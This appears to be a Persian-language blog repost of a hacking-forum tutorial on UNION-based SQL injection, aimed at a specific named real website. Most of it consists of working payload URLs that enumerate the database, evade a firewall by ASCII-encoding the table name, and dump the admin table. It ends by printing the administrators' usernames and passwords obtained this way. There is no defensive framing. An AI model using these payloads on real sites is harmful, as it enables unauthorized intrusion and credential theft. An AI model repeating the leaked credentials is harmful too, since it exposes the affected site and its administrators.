http://emperor-team.org/showthread.php?t=1821&page=3
بدست اوردن تعداد ستون های سایت
http://www.faremondo.org/news.php?nid=-999+order+by+10
http://www.faremondo.org/news.php?nid=-999+order+by+5-- \
ستون
http://www.faremondo.org/news.php?nid=-999+union+all+select+1,2,3,4
Version :
http://www.faremondo.org/news.php?nid=-999+union+all+select+1, version (),3,4
خوب Version سایت : 5.0.92
خوب اگر Version سایت 4 می بود باید با حدس زدن Table ها رو
به دست می اوردیم ولی در Version 5 میتونیم از
Information_schema
استفاده کنیم. بصورت زیر:
http://www.faremondo.org/news.php?nid=-999+union+all+select+1, table_name,3,4+from+informa tion_schema.tables
خوب با وارد کردن دستور بالا فقط قادر به مشاهده ی یک Table هستید برای
مشاهده ی همه ی Table ها از group_concat استفاده می کنیم. بصورت زیر:
http://www.faremondo.org/news.php?nid=-999+union+all+select+1, group_concat (table_name),3, 4+from+information_schema.tables
خوب با وارد کردن دستور بالا تمام Table ها رو مشاهده میکنیم.
Table مورد نظر ما:admin
حالا برای مشاهده ی همه ستون ها بصورت زیر عمل می کنیم:
http://www.faremondo.org/news.php?nid=-999+union+all+select+1, group_concat (column_name),3 ,4+from+information_schema.columns
خوب حالا ما همه ی Table و Column ها روداریم ولی نمیدونیم که کدوم ستون
ماله کدوم جدول هست. برای پیدا کردن ستون های مربوط به هر Table باید از
دستور شرطی Where استفاده کنیم. بصورت زیر:
'union+all+select+1, group_concat (column_name),3,4+ from+information_schema. columns+where+table_name=' admin
دستور
خوب با وارد کردن دستور بالا ارور میگیریم و باید فایروال رو بایپس کنیم.
برای بایپس کردن فایروال از کد های اسکی استفاده می کنیم. بصورت زیر:
(کد اسکی)Char
معادل Admin در کد های اسکی = 97,100,109,105,110
برای به دست اوردن معادل اسکی هر String به سایت زیر مراجعه کنید:
http://www.easycalculation.com/ascii-hex.php
خوب پس دستور ما می شود:
union+all+select+1, group_concat (column_name),3,4+f
rom+information_schema. columns+where+table_name=ch ar
(97,100,109,105,110
دستور
تفسیر دستور بالا:با وارد کردن دستور بالا ما میگیم که به ما ستون هایی رو بده که متعلق به جدول admin است
ستون های جدول ادمین: id, adminname, password
خوب حالا برای بدست اوردن اطلاعات از جدول admin باید بصورت زیر عمل کنیم:
http://www.faremondo.org/news.php?nid=-999+union+all+select+1, group_concat (adminname, pass word),3,4+from+admin
خوب حالا ما با وارد کردن دستور بالا نام و رمز های عبور رو به صورت پشت سر
هم و بدون فاصله مشاهده میکنیم که برای ایجاد فاصله از کد های اسکی
استفاده میکنیم. بصورت زیر:
http://www.faremondo.org/news.php?nid=-999+union+all+select+1, group_concat (adminname, char (58), password),3,4+from+admin
خوب با وارد کردن دستور بالا نام ورمز عبور رو بصورت زیر مشاهده می کنیم:
admin:123456, dd:123456, dragon:123456, amir-magic:123456,
Capoeir4:123456, nooshabe:123456, NVID: 123456, do0nYa:123456,
Jule:123456, mehak:123456, Mask :123456
No comments:
Post a Comment